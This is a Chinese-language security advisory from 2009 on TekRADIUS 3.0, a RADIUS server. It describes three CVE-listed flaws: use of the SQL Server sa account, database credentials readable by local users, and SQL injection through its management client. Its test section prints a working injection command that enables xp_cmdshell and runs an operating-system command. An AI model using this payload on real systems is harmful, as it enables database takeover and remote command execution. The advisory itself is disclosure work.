发布日期：2009-07-08
更新日期：2009-07-09

受影响系统：

Yasin KAPLAN TekRADIUS 3.0

描述：

---

CVE(CAN) ID: CVE-2009-2357,CVE-2009-2358,CVE-2009-2359

TekRadius是一个免费的RADIUS服务器，可以支持RFC 2865和RFC 2866规范。

1) TekRADIUS的默认配置使用sa账号与Microsoft SQL Server通讯，远程攻击者可以相对较容易的获得对数据库的特权访问。

2) TekRADIUS将数据库凭据存储在了C:\Program Files\TekRADIUS\TekRADIUS.ini文件中。任何Windows本地用户都可以访问这个文件，读取加密了的凭据。

3) 可通过GUI或命令行客户端管理TekRADIUS。根据设计，非特权Windows用户仅有有限的功能以防范某些更改。但如果用户在对话框或命令行中提及了恶意参数请求，就可以通过SQL注入攻击对数据库执行非授权操作。

<*来源：Tim Brown （securityfocus@machine.org.uk）
  
  链接：http://marc.info/?l=bugtraq&m=124689568112833&w=2
        http://secunia.com/advisories/35711/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

C:\Program Files\TekRADIUS>trcli  -r "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell', 1; reconfigure; exec master.dbo.xp_cmdshell 'ping www.nth-dimension.org.uk'--"

建议：

---

厂商补丁：

Yasin KAPLAN
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.tekradius.com/

浏览次数：2814
严重程度：0（网友投票）